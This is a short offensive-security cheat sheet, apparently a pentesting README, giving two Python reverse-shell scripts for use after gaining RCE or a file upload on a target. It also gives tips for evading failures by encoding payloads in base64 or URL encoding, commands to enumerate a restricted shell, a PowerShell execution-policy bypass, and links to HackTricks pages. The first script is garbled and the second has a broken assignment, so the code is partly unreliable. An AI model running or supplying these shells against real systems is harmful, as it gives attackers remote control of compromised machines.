# TIPS If you have obtained a vulnerability such as RCE, file upload or something else, you can use the script below to spawn a shell or backconnect revershell. If the shell does not run see below 1. Make sure the target has internet access (internet access opened) 2. Try changing the port to a larger one such as 8080, 8888, etc. 3. Encode your script using base64 and then decode it 4. Encode your script using url encode 5. Check the compiler ## Script 1 ``` socket=_import("socket");os=import("os");pty=import_("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh") ``` ## Script 2 ``` import socket import subprocess import os def back_connect(host, port): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) os.dup2(s.fileno(), 0) os.dup2(s.fileno(), 1) os.dup2(s.fileno(), 2) subprocess.call(["/bin/sh", "-i"]) host = "" port = back_connect(host, port) ``` ### Enum about the jail ``` echo $SHELL echo $PATH env export pwd ``` *Windows Powershell Pro Tips - If you was gett the shell, change to powershell, you can run ``` powershell -ep bypass ``` Source - [Hacktrikcs Escaping from Jails](https://hacktricks.boitatech.com.br/linux-unix/privilege-escalation/escaping-from-limited-bash) - [Hacktricks github escape from jails](https://github.com/HackTricks-wiki/hacktricks/blob/master/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md) - [0xffsec restricted-shells](https://0xffsec.com/handbook/shells/restricted-shells/) - [Hacktrikcs powershell-for-pentesters](https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters)